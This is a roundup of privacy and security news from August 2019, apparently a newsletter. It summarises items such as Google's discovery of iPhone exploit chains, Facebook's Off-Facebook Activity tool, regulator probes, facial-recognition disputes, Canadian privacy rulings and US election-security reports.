Security researchers at Google say they’ve found a number of malicious websites which, when visited, could quietly hack into a victim’s iPhone by exploiting a set of previously undisclosed software flaws. Google’s Project Zero said in a deep-dive blog post published late on Thursday that the websites were visited thousands of times per week by unsuspecting victims, in what they described as an “indiscriminate” attack. “Simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant,” said Ian Beer, a security researcher at Project Zero. He said the websites had been hacking iPhones over a “period of at least two years.” The researchers found five distinct exploit chains involving 12 separate security flaws, including seven involving Safari, the in-built web browser on iPhones. The five separate attack chains allowed an attacker to gain “root” access to the device — the highest level of access and privilege on an iPhone. In doing so, an attacker could gain access to the device’s full range of features normally off-limits to the user. That means an attacker could quietly install malicious apps to spy on an iPhone owner without their knowledge or consent. Google privately disclosed the vulnerabilities in February, giving Apple only a week to fix the flaws and roll out updates to its users. That’s a fraction of the 90 days typically given to software developers, giving an indication of the severity of the vulnerabilities. [TechCrunch] | Sources say China used iPhone hacks to target Uyghur Muslims | Apple Just Gave 1.4 Billion Users A Reason To Quit Their iPads, iPhones | Why the latest iPhone hack should worry you no matter what phone you use | iPhone Hackers Caught By Google Also Targeted Android And Microsoft Windows, Say Sources]

WW – Facebook Rolls Out Tool to Limit Data Collection from Other Companies

Facebook unveiled a feature designed to allow users to limit the data collected by businesses and applications that are then sent to the tech company. The tools to control “Off-Facebook Activity” give users the opportunity to remove shopping habits, web-browsing histories and other activities that are used for targeted ads from their accounts. Facebook officials said the feature will first be available to those in Spain, Ireland and South Korea, with more countries to be added in the coming months. Facebook Product Manager David Baser called the effort “the most powerful and comprehensive tool ever launched in the industry for this kind of data.” Meanwhile, developers have sent a letter to Apple CEO Tim Cook over privacy changes made in iOS 13. [The Washington Post | Facebook’s New Privacy Feature Comes With a Loophole | Facebook’s New Privacy Feature Comes With a Loophole | Facebook unveils new tools to control how websites share your data for ad-targeting | Facebook Begins Rolling Out New Tool to See Which of Its Data Pals Are Monitoring You | Facebook launches long-awaited privacy tool to clear your browsing history | Facebook’s Clear History privacy tool finally begins rolling out in three countries]

WW – Google Announces New Privacy Strategy, Will Limit Chrome Tracking

Google has proposed a new privacy initiative that aims to curb tracking by digital marketers and advertisers. Google’s plan focuses on a privacy budget, which websites can use to pull user information from a given browser and put it into a larger group of anonymous data. The privacy budget would allow users to retain anonymity and put a limit on application programming interface calls a website can make to a browser. Google Engineering Director on Chrome Security and Privacy Justin Schuh said the new proposal aims to “have the same kind of big, bold vision for how we think privacy should work on the web, how we should make browsers and the web more private by default.” [TechCrunch | Google proposes new privacy standards to protect web browsing data | Google proposes new privacy and anti-fingerprinting controls for the web | Google Chrome proposes ‘privacy sandbox’ to reform advertising evils | As browser rivals block third-party tracking, Google pitches ‘Privacy Sandbox’ peace plan]

WW – Facebook Releases Document on Cambridge Analytica Timeline

Facebook and the District of Columbia attorney general released a document to the public about Cambridge Analytica. The document states Facebook employees made a request for an investigation into Cambridge Analytica’s data practices in September 2015. According to the tech company, it did not find out app developer Aleksandr Kogan sold user data to Cambridge Analytica until December 2015. Facebook Vice President and Deputy General Counsel Paul Grewal wrote in a blog post the document was made public to remove confusion over two separate issues. “One involved unconfirmed reports of scraping — accessing or collecting public data from our products using automated means — and the other involved policy violations by Aleksandr Kogan, an app developer who sold user data to Cambridge Analytica,” Grewal writes. “This document proves the issues are separate; conflating them has the potential to mislead people.” [NBC News]

EU – Dutch DPA Asks Irish DPC to Look into Microsoft’s Data Collection Practices

The Dutch data protection authority, the Autoriteit Persoonsgegevens, said Microsoft has remotely collected data from those who use Windows Home and Windows Pro. The DPA announced it discovered the practices as it tested the privacy protection it asked the tech company to implement back in 2017. “Microsoft has complied with the agreements made,” the Dutch authority said. “However, the check also brought to light that Microsoft is remotely collecting other data from users. As a result, Microsoft is still potentially in breach of privacy rules.” As a result, the DPA has asked the Irish Data Protection Commission to take on the probe. Microsoft said in a statement it is committed to protecting privacy and that it welcomes “the opportunity to improve even more the tools and choices we offer to these users.” [Reuters] | Microsoft’s lead EU data watchdog is looking into fresh Windows 10 privacy concerns]

EU – Hamburg DPA Lays Out Legal Requirements for Google to Resume Audio Transcriptions

The Hamburg Commissioner for Data Protection and Freedom of Information met with representatives from Google to discuss its audio transcribing practices. The tech company is not allowed to transcribe audio recordings from its Google Assistant devices unless it meets requirements laid out by the commissioner. Google must receive informed consent from users in order to transcribe any audio, and it must be transparent about instances when a device is incorrectly activated. Hamburg Commissioner for Data Protection and Freedom of Information Johannes Caspar said that should the tech company violate the EU General Data Protection Regulation after it resumes its practices, “urgent measures can be taken at any time to protect the privacy rights of the users.” [Datenshutz]

Other Jurisdictions

IN – Supreme Court Warns Indian Government on Connecting Aadhaar with Social Media

India’s Supreme Court has heard from social media platforms on the possibility of the government linking the country’s Aadhaar identification system to social media accounts. After hearing pleas from Facebook and WhatsApp, Justice Deepak Gupta said such a connection would infringe on citizens’ privacy, adding that the court will eventually have to balance fundamental rights to privacy and security. Talk of the grouping of Aadhaar and social media accounts together began when Attorney General KK Venugopal opined that such a move would boost preventative measures against crime and terrorism. The court will take more responses from stakeholders before a hearing on the matter Sept. 13. [The Economic Times]

Privacy (US)

US – Lawmakers Ask 50 Companies About Student Data Collection

U.S. Sens. Richard Blumenthal, D-Conn., Edward Markey, D-Mass., and Richard Durbin, D-Ill., have asked more than 50 companies about the student information they have gathered and how it is used. The three senators signed two different letters, one that went to education technology companies and another that was sent to data analytics firms. “Education technologies (EdTech) can be important learning tools that allow teachers to follow student progress and facilitate collaboration,” the letter to edtech companies reads. “However, this technology may put students, parents and educational institutions at risk of having massive amounts of personal information stolen, collected, or sold without their permission.” [The Washington Post]

US – Bail Bondsman Obtains Location Data With Fake Calls to Carriers

A Colorado bail bondsman coaxed Sprint, T-Mobile and Verizon into providing him with the location data of bail jumpers through illegal phony calls. Matthew Marre posed as law enforcement when he contacted the phone carriers, which were told Marre was a member of the Colorado Public Safety Task Force dealing with an emergency that required location data on certain individuals. U.S. Sen. Ron Wyden, D-Ore., a privacy critic of phone carriers, took issue with the carriers’ part in Marre’s case. “If true, these allegations would mark a new low in the ongoing scandal of wireless carriers sharing Americans’ location data without our knowledge or consent,” Wyden said in a statement. [The Daily Beast]

US – State Sen. Plans to Reintroduce Biometric Privacy Law to Fla. Lawmakers

U.S. State Sen. Gary Farmer, D-Fla., has plans to propose a previously rejected biometric privacy bill when the state legislature reconvenes. “[Sen.] Farmer does plan on filing it again. He sees it as an issue that we not only expect to face in the future, but in many respects are facing now,” said Jay Shannon, a legislative assistant in Farmer’s office. Farmer’s bill is said to draw parallels to the Illinois Biometric Information Privacy Act. Congressional critics say Farmer’s proposal could expose businesses to costly lawsuits that would be especially negative for small businesses. [The Florida Record]

US – FTC Reaches $30M Settlement with Company Over Deceptive Use of Lead Generators

The U.S. Federal Trade Commission announced it has reached a $30 million settlement with Career Education Corporation over claims it used lead generators in a deceptive manner. The agency alleged CEC took sales leads from lead generators to tell consumers they were associated with the military in order to market different schools. The FTC claimed the company used this misdirection to entice individuals to turn over information in order to help them find jobs or obtain benefits. CEC was also accused of violating the Telemarketing Sales Rule when it reached out to people on the National Do Not Call Registry. In addition to the $30 million, CEC is ordered to investigate the complaints filed against it related to the lead generators. [FTC.gov]

Privacy Enhancing Technologies (PETs)

WW – Using AI, Researchers Mask Emotions from Other AI-Based Products

Researchers from Imperial College London have devised new artificial intelligence software that helps users hide their emotions from other AI-based voice assistants. The technology filters emotional speech into “normal” speech to add a layer between a user and the device they’re using. Lead researcher Ranya Aloufi said the new software may be one of the few forms of data protection there is against voice assistants’ emotion sensors, which may “significantly compromise their privacy.” [Vice]

Security

US – US Seeing Surge of Ransomware Attacks

More than 40 municipalities have been hit with ransomware attacks over the last year. This particular type of cyberattack is not new, but the success of ransomware has led hackers to seek further research and development for more precise attacks. “The business model for the ransomware operators for the past several years has proved to be successful,” Department of Homeland Security Cybersecurity and Infrastructure Security Agency Director Chris Krebs said. “Years of fine-tuning these attacks have emboldened the actors, and you have seen people pay out — and they are going to continue to pay out.” The latest instance of ransomware activity came this week when 22 Texas agencies were attacked. [The New York Times]

WW – Cybersecurity Analysts Say Human Error Responsible for Most Cloud Breaches

Cybersecurity researchers have found most cloud data breaches occur due to a lack of proper data protection and security measures. IT service management company Gartner estimates up to 95% of cloud breaches stem from human errors. The recent Capital One data breach is an example, with a flawed firewall implementation opening access for the hacker. “I still report on average one or two misconfigured [Amazon] S3 buckets per month and the data there is not encrypted. I haven’t seen any encrypted data within an S3 bucket for a long time,” said Bob Diachenko, cyberthreat intelligence director of consulting firm Security Discovery. [The Wall Street Journal]

US – Ill. Passes Bill to Improve Student Data Protection

Gov. JB Pritzker, D-Ill., has signed off on amendments to the Illinois Student Online Personal Protection Act. With the changes, parents now hold more control over their children’s data as the law now requires parents be notified about the details of student data collection, including what kind of data is being collected and why the data is being collected. Parents must also be notified within 30 days if the school suffered a data breach and 60 days if a third party is responsible for a breach. The amendments will take effect July 1, 2021. [WBBM Newsradio]

WW – Data Breach Affects Cloud Firewall Users

Cybersecurity and distributed-denial-of-service migration firm Imperva notified customers of a data breach affecting its Cloud Web Application Firewall product, previously known as Incapsula. The data breach only affected customers who had accounts with Cloud WAF through Sept. 17, 2017. Exposed data included email addresses, hashed and salted passwords, along with application programming interface keys and customer-provided secure sockets layer certificates for a select number of customers. Meanwhile, Presbyterian Healthcare Services has notified 183,000 patients their personal information was exposed due to a phishing scam. [ZDNet]

Smart Cities and Cars

WW – Smart Cities May Be Vulnerable to Cyberattacks

Cities may be under-funding their investment in digital security in their quest to install networks that will further smart-city development. Cities are projected to spend more than half of the $135 billion allotted for digital infrastructure to protect against cyberattacks on other sectors such as financial and IT and defense sectors in 2024. This will leave cities “woefully underfunded and incredibly vulnerable to cyberattacks,” according to ABI Research officials. [GCN]

WW – Carmaker Use of Tracking Sensors Raises Privacy Concerns

Mercedes-Benz is using sensors to track and repossess vehicles. According to a spokeswoman for Mercedes, drivers agree to location tracking when they purchase the car. Privacy advocates have raised concerns about the practice citing it may expose the information to hackers or exploitation. As of March 2018, all new cars built in the European Union must come with location sensors that can transmit data to emergency services if an accident occurs. Meanwhile, MediaPost reports two Colorado residents dropped their location privacy lawsuits “without prejudice” against Google and Apple but not the suit filed against Facebook. [CNN]

HK – Hong Kong Protesters Take Down Smart Lampposts

Protesters in Hong Kong have torn down 20 smart lampposts over fears of government surveillance. The government previously noted the cameras in the lampposts were used for traffic monitoring and other simple monitoring functions, not for keeping tabs on citizens. “August 24 was a dark day for Hong Kong’s innovation and technology,” Secretary for Innovation and Technology Nicholas Yang Wei-hsiung said. “Some people ignored facts and used conspiracy theories to claim smart lamp posts are a privacy risk. We have been clear and transparent from the start, but in return, we get damage. We are rather disappointed.” [The South China Morning Post]

+++

 

1-15 August 2019

Biometrics

US – 1 In 5 Calif. Lawmakers Mistakenly Identified by Facial-Recognition Tech

U.S. Assemblyman Phil Ting, D-Calif., has authored a bill that would ban the use of facial-recognition software on police body cameras throughout the state. Ting was one of 26 California legislators who was incorrectly identified as a criminal in a recent test conducted by the American Civil Liberties Union. Both the ACLU and Ting said the results prove facial-recognition technology is unreliable. “The software clearly is not ready for use in a law enforcement capacity,” Ting said. “These mistakes, we can kind of chuckle at it, but if you get arrested and it’s on your record, it can be hard to get housing, get a job. It has real impacts.” Sponsored by the ACLU, Assembly Bill 1215 needs to pass the Senate before it lands on the governor’s desk. [Los Angeles Times]

US – Amazon Announces Updates to Rekognition

Amazon has announced improvements to Rekognition, the company’s facial-recognition technology. The software’s accuracy and functionality have been updated to boost facial analysis on features such as identifying gender, emotions and age range. “With this release, we have further improved the accuracy of gender identification,” Amazon said in a blog post. “In addition, we have improved accuracy for emotion detection (for all 7 emotions: ‘Happy’, ‘Sad’, ‘Angry’, ‘Surprised’, ‘Disgusted’, ‘Calm’ and ‘Confused’) and added a new emotion: ‘Fear’.” While Amazon stands by its technology, researchers are still unsure of its accuracy given emotions are portrayed differently by different people. Use of the technology by law enforcement has been the subject of controversy in recent months. [CNBC]

UK – ICO Investigates Use of Facial Recognition Tech at King’s Cross Site

The U.K. Information Commissioner’s Office has started to investigate the use of facial-recognition software at the King’s Cross development site. The ICO warned businesses need to demonstrate their use of the technology is “strictly necessary and proportionate” and does not violate any laws. The agency added it will “consider taking action where we find non-compliance with the law.” The owners of the King’s Cross said the facial-recognition tech has been implemented “in the interest of public safety and to ensure that everyone who visits has the best possible experience.” U.K. Information Commissioner Elizabeth Denham said she was “deeply” concerned about the use of the tech as she confirmed the investigation. U.K. Biometric Commissioner Paul Wiles called for an update to laws around facial recognition in response to the King Cross’s use of the tech. [Guardian]

Big Data | Machine Learning | Artificial Intelligence

UK – Research Initiative Launched on Biases Within Law Enforcement Algorithms

The Centre for Data Ethics and Innovation and the Royal United Services Institute have launched a research initiative on possible biases within algorithms used by law enforcement. RUSI will publish its initial research in September, which will be used by CDEI to develop a code of practice for trialing algorithms. CDEI will release a final report on its findings in March 2020, when it will also offer recommendations to the U.K. government. The two groups hosted a series of roundtables in July where police departments, civil society organizations, academics, lawmakers and trade associations discussed the use of algorithms and how the regulatory environment can be improved. [ComputerWeekly]

US – NIST Road Map Covers Developing Standards for AI

The U.S. National Institute of Standards and Technology released its guidance on the government’s approach to develop technical and ethical standards for artificial intelligence. The guidance includes initiatives to assist the government in its efforts to highlight responsible AI use, as well as principles for future standards around the technology. The agency advises that any federal standards for AI must be built to foster innovation and minimize risks of harm. “It is important for those participating in AI standards development to be aware of, and to act consistently with, U.S. government policies and principles, including those that address societal and ethical issues, governance and privacy,” the guidance states. [Nextgov]

UK – Safeguards to Implement When Using Solely Automated AI Systems

As part of its Call for Input on the development of its framework for auditing artificial intelligence, U.K. Information Commissioner’s Office AI Research Fellow Reuben Binns and Technology Policy Adviser Valeria Gallo discuss the safeguards organizations should have in place when they use solely automated AI systems. Under the EU General Data Protection Regulation, organizations need to have safeguards that allow data subjects to obtain human intervention, express their points of view and to contest any decision made about them. Organizations should give their staff the authority to address data subject concerns and override decisions made by AI and consider implementing proper system requirements to support “meaningful human review from the design phase.” [Source]

HK – Hong Kong Introduces Framework for Big Data Governance

Hong Kong’s Institute of Big Data Governance has established the world’s first big data governance principles and an independent evaluation system for businesses and society. The framework incorporates references to global standards, including the EU General Data Protection Regulation and China’s Cyber Security Law. The principles aim to accelerate digital transformation while providing a guide to facilitating reliable cross-border data flow. [EJ Insight]

Canada

CA – Class-Action Lawsuit Launched for Canadian Capital One Breach Victims

Capital One faces a class-action lawsuit which seeks compensation for Canadians affected by its recent data breach. The Ontario-based law firm Diamond & Diamond launched the lawsuit. The representative plaintiff is an Ontario woman who obtained a Costco Whole MasterCard through the credit card company. The statement of claim pushes for the lawsuit to receive class-action certification, and calls for $350 million in financial compensation for the approximately six million Canadians impacted by the incident. Capital One announced it will begin to notify affected individuals via email and letter. [Canadian Press]

CA – OPC Publishes Guidance on Using Social Media

The Office of the Privacy Commissioner of Canada released guidelines to help Canadians protect their privacy when on social media. The OPC advises social media users to read social media platforms’ privacy policies, to get consent when sharing content that involves other users and to understand and manage privacy settings. “It’s best to choose the highest and most restrictive security settings available and not give out information like your phone number, birthday, social insurance number, address and location, and you should consider using a pseudonym,” the guidance states. [OPC]

CA – Political Parties Don’t Meet Voters’ Privacy Expectations: Report

Consumer advocacy group OpenMedia says Canada’s political parties are not meeting voters’ basic expectations of privacy that have been set out by the country’s Chief Electoral Officer and the Office of the Privacy Commissioner of Canada (OPC) [read joint guidance]. The organization conducted a review [PDF] of the parties’ new privacy policies against the guidelines that the Electoral Officer and the OPC put out to comply with Bill C-76 [see here & here], amendments to the Canada Elections Act. Parties include the Liberal Party of Canada, Conservative Party of Canada, Green Party of Canada, the New Democrat Party and the Bloc Québécois. The analysis was conducted using privacy policies as of July 2nd following the June 30th deadline for all parties to comply with C-76. According to the report, all parties (except for the NDP) failed when it comes to informing individuals if they have been subject to a data breach. All parties get partial credit with respect to being transparent about how a person’s information will be used. The report stated that the parties indicate examples of how data is used and shared, however, parties are “not clear whether this is an exhaustive list or whether there are other ways in which data is used or shared.” Parties also receive partial credit for the information that is being shared and giving consent to collecting, using and sharing your information. But OpenMedia’s report indicated that parties do “not spell out key best practice details such as obtaining consent from inferred or predictive data, or obtaining express consent for collecting information on ethnicity, political views or religion.” OpenMedia’ executive director Laura Tribe [here & Twitter here] said: “In the wake of the Facebook and Cambridge Analytica scandal, the constant talk of misinformation, and the growing number of severe data breaches affecting people in Canada, you would hope our political parties would see the value in stepping up to embrace transparency and data protection. Instead, what we’ve been left with is a brutally hypocritical double standard, where politicians see themselves as above the law, and our most sensitive personal data as nothing more than election fuel.” [MobileSyrup]

CA – Poll Suggests Canadians Feel They Lack Control Over Private Data

A majority of Canadians know their rights when it comes to privacy, but polling data in a report commissioned by the Privacy Commissioner Daniel Therrien and released earlier this year suggests an equal number of them also feel powerless when it comes to how private businesses use their private data [see: 2018-19 Survey of Canadians on Privacy – here & here]. It says “Most Canadians feel they have little to no control over how their personal information is being used by companies (67%) or by government (61%).” Moreover, 86% of Canadians disagreed that companies should be able to share people’s personal information for purposes other than to provide them services. After a string of news reports about the misuse of personal information by businesses and privacy breaches – the latest one being the massive hack of credit card company Capital One – it’s no surprise that Canadians are increasingly concerned about privacy protection, the report says. “Among those concerned, 37% are extremely concerned (unchanged from 2016, but up from 34% in 2014). Furthermore, a significant minority (45%) do not feel that businesses in general respect their privacy rights,” the commissioned report reads. Social media is also a source of concern – 87% of Canadians are worried about social media platforms gathering personal information to create detailed profiles about them. The telephone survey was conducted by Phoenix Strategic Perspectives Inc. with 1,516 Canadians aged 16 and older between Feb. 6 and Feb. 20, 2019, and the overall results are considered accurate within 2.5 percentage points, 19 times out of 20. [IT World Canada]

CA – Metrolinx Plan to Sell Riders’ Data Draws Concern from Ontario OIPC

Ontario Information and Privacy Commissioner, Brian Beamish says there are risks to Metrolinx’s plan to sell anonymized ridership data to private companies. The transit agency has agreed to consult with his office before considering proposals to share the data. In a letter addressed to Ontario NDP deputy leader Sara Singh Beamish said until the opposition complained about it, he had not been aware of Metrolinx’s plan, unveiled last week, to sell riders’ information. On August 1, Singh wrote a letter Beamish asking for an investigation into the “ramifications of the use of customer data to further commercial interests.” — read NDP notice] Beamish said he “would be very concerned” if the agency, which is a provincial Crown corporation in charge of transportation for the Greater Toronto and Hamilton Area, “were to share information about its customers” without first conducting “a complete review to ensure that the privacy of individuals is protected.” Beamish said he had spoken with Metrolinx representatives and while they assured him the agency wouldn’t share any data that would reveal riders’ identities, “privacy risks may still exist.” However, he also said he was “pleased to confirm that Metrolinx’s chief privacy officer and chief marketing officer have committed to consulting with our office. In this way, the IPC can ensure that any information released by Metrolinx is properly de-identified and that rider privacy is protected. This should help assure Ms. Singh, as well as other Ontarians, that steps are being taken to address the privacy risks of disclosures of this nature” Metrolinx confirmed last Thursday it was considering selling its passengers’ data as part of a broader plan to raise revenue through private sector sponsorships that could include auctioning off naming rights to GO Transit stations. A Metrolinx document detailing its request posted Friday for expressions of interest in private sponsorships lists a “data exchange” as one of the potential benefits for corporations that partner with the agency. It states the exchange could include the “potential use of aggregated and anonymized Presto ridership and sales data” for “research collaboration” and “customer mapping research” [read 6 pg PDF plan overview & TS coverage] The document says personal information recorded through the Presto fare card system, which can include details such as credit card numbers and home addresses, wouldn’t be shared. Instead, the agency believes anonymized data about topics such as station usage, ridership by time of day and ridership growth could be valuable to sponsors. According to the privacy commissioner, there are some “exceptional cases” in which government organizations sell personal information that’s been scrubbed of identifying features. For instance, the Municipal Property Assessment Corporation, a non-profit corporation accountable to the provincial government, sells non-identifiable property assessment data to the public. [The Toronto Star | Metrolinx to consult Ontario privacy watchdog before sharing ridership data | Social Sharing | GO Transit station names could change with new government proposal | Doug Ford slammed for offering to sell transit riders’ data to corporations | Metrolinx to sell naming rights for railway stations, waiting areas, parking lots | NDP blasts GO Transit naming rights in the most bizarre way]

CA – Alberta Court Ruling Prompts Call for Legislation to Protect People Who Need Police Record Checks

When prospective job applicants are asked for police record checks, what comes back could depend on what province they’re in. There have been cases of documents coming back that include unsubstantiated tips, unproved allegations, and even mental-health incidents. They can cause people to miss out on jobs, lose academic scholarships or even get turned away at international borders. An Alberta court ruling, released Aug. 1 [see Edmonton (Police Service) v Alberta (Information and Privacy Commissioner), 2019 ABQB 587 – CanLII & read PDF] has underscored those concerns [read extended coverage] – and led to calls for that province to introduce legislation to protect people from being “held ransom” by the discretion of police officers. [The decision] upheld a privacy complaint filed by an Edmonton man [read 32 pg PDF OIPC findings in Case File F7687]. He lost his job after the city’s police force erroneously labelled him a sex offender and illegally passed along details from a youth conviction to his employer, where had worked for more than a decade. The judge in the case said the situation underscored the need for laws to protect people from having such information released. Until that happens, he said prospective employees in sectors that require those documents are effectively “held ransom” by a system that relies on police officers’ discretion. Alberta’s privacy commissioner is waiting to see whether the Edmonton Police Service will appeal the recent court ruling before sending a letter calling for change to the provincial government – see here]. Alberta’s Justice Minister says the government is reviewing the decision. The Alberta Association of Chiefs of Police issued guidelines in 2018 that request officers don’t release non-conviction information in police checks unless they think it is relevant to the person’s job. Ontario is the only province in Canada with legislation that restricts the type of information police can release. Under a law that took effect last year, police cannot release records that did not result in convictions in all but the most extreme circumstances. The B.C. government passed a policy in 2014 that forbids the disclosure of mental-health calls. However, civil-liberties groups in that province say mishandled police record checks are an ongoing problem and a law is needed. [The Globe and Mail | Alberta government urged to regulate police record checks]

E-Government

US – Judge Rules No More Paperless Voting in Georgia After 2019

A federal judge has ruled that the US state of Georgia must phase out its paperless voting systems before the 2020 primary election. The ruling does not require the state to move to hand marked ballots. The state is now prohibited from conducting elections on the old direct recording electronic (DRE) touchscreen machines it has used for 17 years and the ruling does not allow them to be kept as stopgap measures. The DREs do not generate an auditable paper trail for votes. The ruling allows the state to proceed with its plan to purchase new touchscreen machines that generate a paper ballot to be scanned. [statescoop: Federal judge bans paperless voting machines in Georgia after 2019 | lawyerscommittee.org: CIVIL ACTION NO. 1:17-CV-2989-AT]

US – States Making Some Progress in Election Systems Security: Report

A report from the Brennan Center for Justice examines steps US states have made in replacing outdated systems and in adopting “statistically sound audits,” two recommendations made by the Senate Select Committee on Intelligence in its report on Russian interference in US elections. This report looks at progress since 2016 and what remains to be done before the 2020 election. The Brennan Center report says that while some states are replacing paperless direct recording electronic (DRE) voting machines, with systems that generate voter verifiable paper record, as many as 16 million people will still be casting their 2020 votes on machines that do not provide any sort of paper trail. At least 24 states are expected to require post-election audits before certifying 2020 election results. Just two states, Colorado and Rhode Island, require Risk Limiting Audits (RLAs) before election results can be legally certified; other states are piloting RLA programs. [brennancenter.org: Voting Machine Security: Where We Stand Six Months Before the New Hampshire Primary | meritalk: Eight States Will Vote Paperless in 2020 Despite Security Risks]

US – Blockchain Does Not Ensure Secure Voting: Experts

Thirty-two US states allow some sort of online voting for some voters – often this is for members of the military and their families who are living overseas to cast absentee ballots. Some US states have launched blockchain-based mobile voting pilots. Security experts have expressed concerns that using blockchain for mobile voting spells trouble. Concerns raised include the fact that using blockchain assumes the device from which someone is casting a vote contains no malware. Experts have criticized Voatz, the company that provided the technology used in three blockchain-based mobile voting pilots, for not providing a “detailed technical description” of the technology it uses, noting that the technology has not been federally certified. [computerworld: Why blockchain-based voting could threaten democracy | cse.sc.edu: What We Don’t Know About the Voatz “Blockchain” Internet Voting System]

US – Researchers Find Back-end Election Systems Are Connected to the Internet

Election security experts have found what they believe to be more than 30 back-end election systems in 10 US states connected to the Internet, some for more than a year. The researchers contacted the jurisdictions and some removed the systems from the Internet, but others did not. Some election officials said their systems were not connected because the vendor had installed the system and the jurisdiction had no oversight in the process. [vice.com: Exclusive: Critical U.S. Election Systems Have Been Left Exposed Online Despite Official Denials]

US – Utah to Test Blockchain Voting Through Mobile Apps

As we head toward 2020, expect significant public debate relating to smartphone applications designed to increase turnout and participation in upcoming elections. The Democrats announcing in July plans to allow telephone voting in lieu of appearing for neighborhood caucus meetings in the key early primary states of Iowa and Nevada. Given concerns regarding security and reliability of submitting votes over the internet, jurisdictions around the country have begun to test solutions involving blockchain technology to allow absentee voters to submit voting ballots. Following initial pilot programs in Denver [read earlier coverage] and West Virginia [read earlier coverage], Utah County, Utah will be the next jurisdiction to utilize a blockchain-based mobile in connection with its upcoming municipal primary and general elections [read PR notice]. The pilot program, which will utilize the mobile voting application “Voatz” [see here], will allow active duty military, their eligible dependents, and overseas voters to cast absentee ballots. Eligible voters will need to apply for an absentee ballot with the county clerk and then download the mobile application. The ballot itself will be unlocked using the smartphone’s biometric data (i.e., a fingerprint or facial recognition) and then will be distributed into the blockchain framework for tabulation. [Data Privacy + Security Insider (Robinson + Cole) | Voting by Phone Is Convenient, But Is It Too Risky? | Utah County to pilot blockchain-based mobile voting | West Virginia and Denver say mobile voting pilots increased turnout

Electronic Records

WW – Implementing an IG Network is Main Priority for Businesses: Study

Implementing an information governance network is the main priority for organizations in Australia and New Zealand, according to the 2019 Information Governance ANZ industry survey results. Respondents identified three key areas of IG projects: good business management practices; external regulatory, compliance or legal obligations; and internal technology restructuring or transition. More than 40% of 340 respondents said privacy regulatory changes, such as the EU General Data Protection Regulation and Australia Notifiable Data Breaches scheme, were the impetus behind their current IG projects. The study also revealed that IG has grown since the first IG survey in 2016. “IG appears to have matured since our initial survey, with over half assessing their IG programs as intermediate or advanced in maturity and a similar percentage ranking their IG programs as proactive rather than reactive,” according to the Study.

WW – ISO Publishes First International Standards for Privacy Information Management

The International Organization for Standardization has published the first International Standards for privacy information management. ISO/IEC 27701 specifies requirements “for establishing, implementing, maintaining and continually improving a privacy-specific information security management system,” ISO said in the announcement. “In other words, a management system for protecting personal data (PIMS).” CNIL Head of the Technology Experts Department Matthieu Grall and Microsoft Corporate Vice President and Deputy General Counsel of Privacy and Regulatory Affairs Julie Brill were among those who participated in the development of the standards. “We applaud the ISO/IEC technical committee for developing this groundbreaking standard for privacy so that organizations of all sizes, jurisdictions, and industries can effectively protect and control the personal data they handle,” Brill said. [ISO.org]

EU Developments

EU – Majority of Cookie Notices Are Not GDPR Compliant: Study

Researchers from the University of Michigan and Ruhr-University Bochum in Germany examined the cookie notices of roughly 5,000 websites to see whether they are compliant with the EU General Data Protection Regulation. In their upcoming paper on the subject, the researchers found 58% of notices are at the bottom of the screen and that 57% use “dark patterns” to influence users to consent to tracking. While 92% of those notices contain a link to a site’s privacy policy, only 39% mention why data has been collected. “Given the legal requirements for explicit, informed consent, it is obvious that the vast majority of cookie consent notices are not compliant with European privacy law,” the researchers state. [TechCrunch]

EU – Regulators Increase Focus on Digital Ad Industry

European Union regulators have increased their focus on the digital advertising industry. The crux of their investigations is whether advertising technology companies have violated the EU General Data Protection Regulation. The U.K. Information Commissioner’s Office released a report earlier this year in which it put the adtech industry on notice. France’s data protection authority, the CNIL, and the Irish Data Protection Commission have committed to investigations into the industry’s practices. One area of concern for regulators is real-time bidding, particularly when it is done by smaller companies that may not have the resources to properly protect the data they collect. [Wall Street Journal]

EU – Parliament Report Covers GDPR’s Impact on Scientific Research Rules

The European Parliament Panel for the Future of Science and Technology released a report last month on the impact the EU General Data Protection Regulation has on scientific research rules. The panel finds the GDPR will likely improve several aspects of scientific research, such as data security, regulatory clarity around data processing and data processor responsibilities and data subject trust. The report notes there are still some “regulatory ambiguities” around how it applies to research. In order to address those concerns, the panel offers recommendations researches can use to “find common ground with the new legal rules on data protection and how the scientific community can prepare for GDPR compliance, with a special focus on [delineating] regulatory, procedural and educational solutions.” [EuroParl]

EU – Parliament Releases Study on Relationship Between Blockchains, GDPR

The European Parliamentary Research Service has published a report analyzing the relationship between blockchain technologies and the EU General Data Protection Regulation. The study reveals the friction between the technology and law, specifically pointing to contrasts with the defined role of a data controller and the deletion of data. Additionally, the study showed blockchains have the ability to help achieve GDPR objectives. EPRS also published policy options that could help align blockchains and the GDPR, including measures related to regulatory guidance, code of conduct and certification mechanism support and research funding. [EuroParl]

UK – Denham Offers Update on ICO’s Code of Practice for Children’s Privacy

U.K. Information Commissioner Elizabeth Denham offered an update to the code of practice the Information Commissioner’s Office is developing to protect children’s privacy. After it launched a consultation in April, Denham writes more than 450 written responses were sent to the agency and more than 40 meetings were held with stakeholders. Denham hopes the code will translate requirements found within the EU General Data Protection Regulation into design standards for online services. “The GDPR already sets out rules on how data can be used and the importance of protecting children,” Denham writes. “Our code will make the requirements clearer and help designers and developers understand what is expected of them.” A final version of the code is expected to be sent to the Secretary of State by Nov. 23. [ICO.org.uk]

UK – ICO Opens Consultation on Framework for Data Use in Political Campaigns

The U.K. Information Commissioner’s Office is seeking feedback on its “Guidance on Political Campaigning,” a draft framework code of practice regarding the use of personal data in political campaigns. The framework seeks to explain and better define how data protection and electronic marketing laws apply to campaigning efforts. “This will serve both as helpful guidance in its own right as well as having the potential to become a statutory code of practice if the relevant legislation is introduced,” the ICO said in its announcement of the framework and consultation. The public consultation will remain open through Oct. 4. [ICO.org.uk]

US – CIPL Issues White Paper on New Standard Contractual Clauses

